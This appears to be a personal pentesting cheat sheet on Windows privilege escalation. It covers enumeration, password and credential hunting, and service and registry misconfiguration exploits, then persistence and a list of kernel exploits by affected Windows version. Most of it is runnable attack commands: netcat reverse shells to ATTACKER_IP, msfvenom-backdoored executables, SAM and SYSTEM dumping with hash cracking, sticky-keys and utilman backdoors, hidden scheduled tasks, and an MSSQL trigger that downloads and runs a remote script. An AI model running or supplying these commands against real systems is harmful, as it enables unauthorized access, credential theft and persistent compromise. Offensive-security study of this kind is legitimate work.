Neko

Windows Privilege Escalation and Kernel Sploits

Initial enumeration, low-hanging exploits and a list of common kernel exploits along with the versions commonly vulnerable.

I added a search bar so you can easily search for exploits. Just click "Show all", then search the version of Windows and it'll take you to the first occurence and it should highlight the rest.


Last updated: May 4th, 2023

Local Enumeration

System

systeminfo
hostname
wmic qfe <# checks for recent patches #>
wmic logicaldisk get caption,description,providername <# list drives #>
tasklist <# check running processes and PID #>
schtask <#check tasks, may require admin#>
ps <#in powershell>

User

whoami <# user info #>
whoami /priv <# privilege info #>
whoami /groups <# group info #>
net user <# shows all users #>
net user *user* <# shows user info for targeted user #>
net localgroup
net localgroup administrators <# shows administrator group info #>
icacls file <#use to check perm on executable#>

Network

ipconfig /all <# network info #>
arp -a <# checks arp tables #>
route print <# shows what devices are being commed with #>
netstat -ano <# shows ports; very helpful, -b will list program names#>
net share 

Service

sc qc <service>
sc query windefend
sc queryex type= service
netsh firewall show state

Files

#Finding hidden files
gci -recurse | % { gi $_.FullName -stream * } | where stream -ne ':$Data'
gci -force
#Reading
Get-Content -path c:\Users\example\example --stream example

Passwords

findstr /si password *.txt *.ini *.config *.xml
#Find all those strings in config files.
dir /s *pass* == *cred* == *vnc* == *.config*
# Find all passwords in all files.
findstr /spin "password" *.*
findstr /spin "password" *.*
#Common Password Files, look for BASE64
c:\sysprep.inf
c:\sysprep\sysprep.xml
c:\unattend.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml
dir c:\*vnc.ini /s /b
dir c:\*ultravnc.ini /s /b
dir c:\ /s /b | findstr /si *vnc.ini
# In Registry
# VNC
reg query "HKCU\Software\ORL\WinVNC3\Password"
# Windows autologin
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
# SNMP Paramters
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"
# Putty
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
# Search for password in registry
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
#web server
#saved credentials

Local Exploitation

Insecure Service Permissions

accesschk.exe /accepteula -uwcqv <user> <service>
sc qc <service>
sc config <service> binpath= ""C:PathTorevshell.exe""
net start <service>

Unquoted Service Path

sc qc <service>
accesschk.exe /accepteula -uwdq "C:Program FilesUnquoted Path Service"
copy shell.exe "C:Program FilesUnquoted Path ServiceCommon.exe" (Common Files folder)
net start <service>

Weak Registry Permissions

sc qc <service>
accesschk.exe /accepteula -uvwqk HKLMSystemCurrentControlSetServices<service>
reg add HKLMSYSTEMCurrentControlSetservicesregsvc /v ImagePath /t REG_EXPAND_SZ /d C:PrivEscreverse.exe /f

Always Install Elevated

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
msiexec /quiet /qn /i C:\PrivEsc\reverse.msi

SAM Files

copy C:WINDOWSRepairSAM \<IP><SHARE>
copy C:WINDOWSRepairSYSTEM \<IP><SHARE>
pwdump.py SYSTEM SAM
hashcat -m 1000 --force <hash> /usr/share/wordlists

Scheduled Tasks

#list scheduled tasks
schtasks
#retrieve info about command
schtasks /query /tn vulntask /fo list /v
#privileges/permissions
accesschk.exe /accepteula -quvw user c:\tasks\schtask.bat
icacls c:\tasks\schtask.bat
#overwrite the task to run
echo c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 4444 > C:\tasks\schtask.bat
schtasks /run /tn vulntask

Bypass Upload Access Denied

powershell.exe -c "iwr https://192.168.49.139/nc.exe -OutFile C:tempnc.exe"

RunAs

runas /env /profile /user:<DOMAIN/PC>Administrator "C:tempnc.exe -e cmd.exe 

Persistence

Accounts

Groups

#Add users to groups
#add to admins
net localgroup administrators user123 /add
#add to backup, more subtle, privs ignore DACL, copy SAM and SYSTEM then crack hashes
net localgroup "Backup Operators" user123 /add
#add rdp
net localgroup "Remote Management Users" user123 /add

#logging in remotely may pose issues, if UAC blocks token policy below
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /t REG_DWORD /v LocalAccountTokenFilterPolicy /d 1

#download SAM and SYSTEM
reg save hklm\system system.bak
reg save hklm\sam sam.bak

download system.bak
download sam.bak

Special Privileges

#assigning privileges
secedit /export /cfg config.inf

#modifying security descriptors
Set-PSSessionConfiguration -Name Microsoft.PowerShell -showSecurityDescriptorUI

#RID Hijacking, the default rid for admin is 500
#list sids, rid is last section
wmic useraccount get name,sid

#psexec can be used to run regedit as SYSTEM
PsExec64.exe -i -s regedit

#RID will be in HKLM\SAM\SAM\Domains\Account\Users\
#search for a key with its RID in hex (1010 = 0x3F2)
#effective RID is in F
#in little endian
#RID of Administrator in hex (500 = 0x01F4)

Files

#Modifying exe payloads
msfvenom -a x64 --platform windows -x putty.exe -k -p windows/x64/shell_reverse_tcp lhost=ATTACKER_IP lport=4444 -b "\x00" -f exe -o puttyX.exe

#Modify an existing shortcut to point to a different binary
#Example calc.exe
Start-Process -NoNewWindow "c:\tools\nc64.exe" "-e cmd.exe ATTACKER_IP 4445" 
powershell.exe -WindowStyle hidden C:\Windows\System32\backdoor.ps1

#Hijacking File Associations
#HKLM\Software\Classes\
#When we id a target filetype, such as .txt, we will find an associated progID under data.
#The progID will also be in HKLM\Software\Classes\
#Change the data to powershell.exe -WindowStyle hidden C:\Windows\System32\backdoor.ps1

Services

msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4448 -f exe-service -o rev-svc.exe
#Transfer to victime
sc.exe create exampleService binPath= "C:\windows\rev-svc.exe" start= auto
sc.exe start exampleService
#We can also change an existing service
sc.exe config exampleService binPath= "C:\windows\rev-svc2.exe" start= auto obj= "LocalSystem"

#Startup
C:\Users\<your_username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
#make rev
msfvenom -p windows/x64/shell_reverse_tcp LHOST=x.x.x.x LPORT=4450 -f exe -o revshell.exe
copy revshell.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\"
#Alternatively
#    HKCU\Software\Microsoft\Windows\CurrentVersion\Run
#    HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
#    HKLM\Software\Microsoft\Windows\CurrentVersion\Run
#    HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
move revshell.exe C:\Windows
#Create REG_EXPAND_SZ in one of the above with data pointing to revshell

#Winlogon
#HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\
#Userinit and Shell
#append data with a comma and revshell location

#LogonScript
#HKCU\Environment
#UserInitMprLogonScript = revshell location

#Sticky Keys
takeown /f c:\Windows\System32\sethc.exe
icacls C:\Windows\System32\sethc.exe /grant Administrator:F
copy c:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe

#Utilman
takeown /f c:\Windows\System32\utilman.exe
icacls C:\Windows\System32\utilman.exe /grant Administrator:F
copy c:\Windows\System32\cmd.exe C:\Windows\System32\utilman.exe

#Other Services
#Web
move shell.aspx C:\inetpub\wwwroot\

#MSSQL
#new query
sp_configure 'Show Advanced Options',1;
RECONFIGURE;
GO
sp_configure 'xp_cmdshell',1;
RECONFIGURE;
GO
#Grant sysadmins privs
USE master
GRANT IMPERSONATE ON LOGIN::sa to [Public];
USE HRDB
CREATE TRIGGER [sql_backdoor]
ON HRDB.dbo.Employees 
FOR INSERT AS
EXECUTE AS LOGIN = 'sa'
EXEC master..xp_cmdshell 'Powershell -c "IEX(New-Object net.webclient).downloadstring(''http://ATTACKER_IP:8000/evilscript.ps1'')"';

Scheduled Tasks

#Create a taskschtasks /create /sc minute /mo 1 /tn backdoorTask /tr "c:\tools\nc64 -e cmd.exe x.x.x.x 4449" /ru SYSTEM
#We can then hide the task
PsExec64.exe -s -i regedit
#HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\backdoorTask
#Delete SD

RDP

<

Kernel Exploits

MS09-012 "Churrasco"

Affected Versions

  • Microsoft Windows 2000 Service Pack 4
  • Windows XP Service Pack 2 and Windows XP Service Pack 3
  • Windows XP Professional x64 Edition and Windows XP Professional x64 Edition Service Pack 2
  • Windows Server 2003 Service Pack 1 and Windows Server 2003 Service Pack 2
  • Windows Server 2003 x64 Edition and Windows Server 2003 x64 Edition Service Pack 2
  • Windows Server 2003 with SP1 for Itanium-based Systems and Windows Server 2003 with SP2 for Titanium-based Systems
  • Windows Vista and Windows Vista Service Pack 1
  • Windows Vista x64 Edition and Windows Vista x64 Edition Service Pack 1
  • Windows Server 2008 for 32-bit Systems
  • Windows Server 2008 for x64-based Systems
  • Windows Server 2008 for Itanium-based Systems

Reliable Exploits

MS10-015 "KiTrap0D"

Affected Versions

  • Windows Server 2003, Windows Server 2008, 7, XP
  • Windows 2000 Service Pack 4
  • Windows XP Service Pack 2 and Windows XP Service Pack 3
  • Windows XP Professional x64 Edition Service Pack 2
  • Windows Server 2003 Service Pack 2
  • Windows Server 2003 x64 Edition Service Pack 2
  • Windows Server 2003 with SP2 for Itanium-based Systems
  • Windows Vista Windows Vista Service Pack 1 and Windows Vista Service Pack 2
  • Windows Vista x64 Edition Windows Vista x64 Edition Service Pack 1 and Windows Vista x64 Edition Service Pack 2
  • Windows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit
  • Systems Service Pack 2*
  • Windows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 2*
  • Windows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based Systems Service Pack 2
  • Windows 7 for 32-bit Systems

Reliable Exploits

I haven't been able to find an exploit that will elevate the current shell, they all seem to spawn a new shell. If you know of one let me know!

MS10-059 "Churraskito"

Affected Versions

  • Windows Vista Service Pack 1 and Windows Vista Service Pack 2
  • Windows Vista x64 Edition Service Pack 1 and Windows Vista x64 Edition Service Pack 2
  • Windows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2*
  • Windows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 2*
  • Windows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based Systems Service Pack 2
  • Windows 7 for 32-bit Systems
  • Windows 7 for x64-based Systems
  • Windows Server 2008 R2 for x64-based Systems*
  • Windows Server 2008 R2 for Itanium-based Systems

Reliable Exploits

MS10-092 "Schelevator"

Affected Versions

  • Windows Vista Service Pack 1 and Windows Vista Service Pack 2
  • Windows Vista x64 Edition Service Pack 1 and Windows Vista x64 Edition Service Pack 2
  • Windows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2*
  • Windows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 2*
  • Windows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based Systems Service Pack 2
  • Windows 7 for 32-bit Systems
  • Windows 7 for x64-based Systems
  • Windows Server 2008 R2 for x64-based Systems*
  • Windows Server 2008 R2 for Itanium-based Systems

Reliable Exploits

MS11-046 "afd.sys"

Affected Versions

  • Windows XP SP3 x86
  • Windows XP Pro SP2 x64
  • Windows Server 2003 SP2 x86
  • Windows Server 2003 SP2 x64
  • Windows Server 2003 SP2 Itanium-based Systems
  • Windows Vista SP1 x86
  • Windows Vista SP2 x86
  • Windows Vista SP1 x64
  • Windows Vista SP2 x64
  • Windows Server 2008 x86
  • Windows Server 2008 SP2 x86
  • Windows Server 2008 x64
  • Windows Server 2008 SP2 x64
  • Windows Server 2008 Itanium-based Systems
  • Windows Server 2008 SP2 Itanium-based Systems
  • Windows 7 x86
  • Windows 7 SP1 x86
  • Windows 7 x64
  • Windows 7 SP1 x64
  • Windows Server 2008 R2 x64
  • Windows Server 2008 R2 SP1 x64
  • Windows Server 2008 R2 Itanium-based Systems
  • Windows Server 2008 R2 SP1 Itanium-based Systems

Reliable Exploits

MS11-062 "NDISTAPI"

Affected Versions

  • Windows XP SP3 x86
  • Windows XP Pro SP2 x64
  • Windows Server 2003 SP2 x86
  • Windows Server 2003 SP2 x64
  • Windows Server 2003 SP2 Itanium-based Systems

Reliable Exploits

MS11-080 "AfdJoinLeaf"

Affected Versions

  • Windows XP Service Pack 3
  • Windows XP Professional x64 Edition Service Pack 2
  • Windows Server 2003 Service Pack 2
  • Windows Server 2003 x64 Edition Service Pack 2
  • Windows Server 2003 with SP2 for Itanium-based Systems

Reliable Exploits

MS14-002 "NDPROXY"

Affected Versions

  • Windows XP Service Pack 3
  • Windows XP Professional x64 Edition Service Pack 2
  • Windows Server 2003 Service Pack 2
  • Windows Server 2003 x64 Edition Service Pack 2
  • Windows Server 2003 with SP2 for Itanium-based Systems

Reliable Exploits

MS14-040 "Dangling Pointer"

Affected Versions

  • Windows Server 2003 Service Pack 2
  • Windows Server 2003 x64 Edition Service Pack 2
  • Windows Server 2003 with SP2 for Itanium-based Systems
  • Windows Vista Service Pack 2
  • Windows Vista x64 Edition Service Pack 2
  • Windows Server 2008 for 32-bit Systems Service Pack 2
  • Windows Server 2008 for x64-based Systems Service Pack 2
  • Windows Server 2008 for Itanium-based Systems Service Pack 2
  • Windows 7 for 32-bit Systems Service Pack 1
  • Windows 7 for x64-based Systems Service Pack 1
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1
  • Windows Server 2008 R2 for Itanium-based Systems Service Pack 1
  • Windows 8 for 32-bit Systems
  • Windows 8 for x64-based Systems
  • Windows 8.1 for 32-bit Systems
  • Windows 8.1 for 32-bit Systems[2] (2973408)
  • Windows 8.1 for x64-based Systems
  • Windows Server 2012
  • Windows Server 2012 R2
  • Windows RT[3] (2961072)
  • Windows RT 8.1[1][3] (2961072)

Reliable Exploits

MS14-058 "win32k.sys"

Affected Versions

  • Windows Server 2003, Windows Server 2008, Windows Server 2012, 7, 8
  • Windows Server 2003 Service Pack 2
  • Windows Server 2003 x64 Edition Service Pack 2
  • Windows Server 2003 with SP2 for Itanium-based Systems
  • Windows Vista Service Pack 2
  • Windows Vista x64 Edition Service Pack 2
  • Windows Server 2008 for 32-bit Systems Service Pack 2
  • Windows Server 2008 for x64-based Systems Service Pack 2
  • Windows Server 2008 for Itanium-based Systems Service Pack 2
  • Windows 7 for 32-bit Systems Service Pack 1
  • Windows 7 for x64-based Systems Service Pack 1
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1
  • Windows Server 2008 R2 for Itanium-based Systems Service Pack 1
  • Windows 8 for 32-bit Systems
  • Windows 8 for x64-based Systems
  • Windows 8.1 for 32-bit Systems
  • Windows 8.1 for x64-based Systems
  • Windows Server 2012
  • Windows Server 2012 R2
  • Windows RT[1] (3000061)
  • Windows RT 8.1[1] (3000061)
  • Windows Server 2008 for 32-bit Systems Service Pack 2
  • Windows Server 2008 for x64-based Systems Service Pack 2
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1

Reliable Exploits

MS14-070 "TCP/IP IOCTL"

Affected Versions

  • Windows Server 2003 Service Pack 2
  • Windows Server 2003 x64 Edition Service Pack 2
  • Windows Server 2003 with SP2 for Itanium-based System

MS15-051 "ClientCopyImage"

Affected Versions

  • Windows Server 2003 Service Pack 2
  • Windows Server 2003 x64 Edition Service Pack 2
  • Windows Server 2003 with SP2 for Itanium-based Systems
  • Windows Vista Service Pack 2
  • Windows Vista x64 Edition Service Pack 2
  • Windows Server 2008 for 32-bit Systems Service Pack 2
  • Windows Server 2008 for x64-based Systems Service Pack 2
  • Windows Server 2008 for Itanium-based Systems Service Pack 2
  • Windows 7 for 32-bit Systems Service Pack 1
  • Windows 7 for x64-based Systems Service Pack 1
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1
  • Windows Server 2008 R2 for Itanium-based Systems Service Pack 1
  • Windows 8 for 32-bit Systems
  • Windows 8 for x64-based Systems
  • Windows 8.1 for 32-bit Systems
  • Windows 8.1 for x64-based Systems
  • Windows Server 2012
  • Windows Server 2012 R2
  • Windows RT[1] (3045171)
  • Windows RT 8.1[1] (3045171)
  • Windows Server 2008 for 32-bit Systems Service Pack 2
  • Windows Server 2008 for x64-based Systems Service Pack 2
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1

Reliable Exploits

MS16-014 "wmi recv notif"

Affected Versions

  • Windows Vista Service Pack 2
  • Windows Vista x64 Edition Service Pack 2
  • Windows Server 2008 for 32-bit Systems Service Pack 2
  • Windows Server 2008 for x64-based Systems Service Pack 2
  • Windows Server 2008 for Itanium-based Systems Service Pack 2
  • Windows 7 for 32-bit Systems Service Pack 1
  • Windows 7 for x64-based Systems Service Pack 1
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1
  • Windows Server 2008 R2 for Itanium-based Systems Service Pack 1
  • Windows 8.1 for 32-bit Systems
  • Windows 8.1 for x64-based Systems
  • Windows Server 2012
  • Windows Server 2012 R2
  • Windows RT 8.1[1] (3126587)
  • Windows RT 8.1[1] (3126593)
  • Windows 10 for 32-bit Systems
  • Windows 10 for x64-based Systems
  • Windows 10 Version 1511 for 32-bit Systems
  • Windows 10 Version 1511 for x64-based Systems
  • Windows Server 2008 for 32-bit Systems Service Pack 2
  • Windows Server 2008 for x64-based Systems Service Pack 2
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1

MS16-016 "mrxdav.sys"

Affected Versions

  • Windows Vista Service Pack 2
  • Windows Vista x64 Edition Service Pack 2
  • Windows Server 2008 for 32-bit Systems Service Pack 2
  • Windows Server 2008 for x64-based Systems Service Pack 2
  • Windows 7 for 32-bit Systems Service Pack 1
  • Windows 7 for x64-based Systems Service Pack 1
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1

Reliable Exploits

MS16-032 "secondary logon"

Affected Versions

  • Windows Vista Service Pack 2
  • Windows Vista x64 Edition Service Pack 2
  • Windows Server 2008 for 32-bit Systems Service Pack 2
  • Windows Server 2008 for x64-based Systems Service Pack 2
  • Windows Server 2008 for Itanium-based Systems Service Pack 2
  • Windows 7 for 32-bit Systems Service Pack 1
  • Windows 7 for x64-based Systems Service Pack 1
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1
  • Windows Server 2008 R2 for Itanium-based Systems Service Pack 1
  • Windows 8.1 for 32-bit Systems
  • Windows 8.1 for x64-based Systems
  • Windows Server 2012
  • Windows Server 2012 R2
  • Windows RT 8.1 [1] (3139914)
  • Windows 10 for 32-bit Systems
  • Windows 10 for x64-based Systems
  • Windows 10 Version 1511 for 32-bit Systems
  • Windows 10 Version 1511 for x64-based Systems

Reliable Exploits

MS16-098 "RGNOBJ"

Affected Versions

  • Windows Vista Service Pack 2
  • Windows Vista x64 Edition Service Pack 2
  • Windows Server 2008 for 32-bit Systems Service Pack 2
  • Windows Server 2008 for x64-based Systems Service Pack 2
  • Windows Server 2008 for Itanium-based Systems Service Pack 2
  • Windows 7 for 32-bit Systems Service Pack 1
  • Windows 7 for x64-based Systems Service Pack 1
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1
  • Windows Server 2008 R2 for Itanium-based Systems Service Pack 1
  • Windows 8.1 for 32-bit Systems
  • Windows 8.1 for x64-based Systems
  • Windows Server 2012
  • Windows Server 2012 R2
  • Windows RT 8.1[1] (3177725)
  • Windows 10 for 32-bit Systems
  • Windows 10 for x64-based Systems
  • Windows 10 Version 1511 for 32-bit Systems
  • Windows 10 Version 1511 for x64-based Systems
  • Windows 10 Version 1607 for 32-bit Systems
  • Windows 10 Version 1607 for x64-based Systems

MS16-135 "NtSetWindowLongPtr"

Affected Versions

  • Windows Vista Service Pack 2
  • Windows Vista x64 Edition Service Pack 2
  • Windows Server 2008 for 32-bit Systems Service Pack 2
  • Windows Server 2008 for x64-based Systems Service Pack 2
  • Windows Server 2008 for Itanium-based Systems Service Pack 2
  • Windows 7 for 32-bit Systems Service Pack 1
  • Windows 7 for x64-based Systems Service Pack 1
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1
  • Windows Server 2008 R2 for Itanium-based Systems Service Pack 1
  • Windows 8.1 for 32-bit Systems
  • Windows 8.1 for x64-based Systems
  • Windows Server 2012
  • Windows Server 2012 R2
  • Windows 10 for 32-bit Systems
  • Windows 10 for x64-based Systems
  • Windows 10 Version 1511 for 32-bit Systems
  • Windows 10 Version 1511 for x64-based Systems
  • Windows Server 2016 for x64-based Systems

Reliable Exploits

MS17-010 "Eternal Blue"

Affected Versions

Reliable Exploits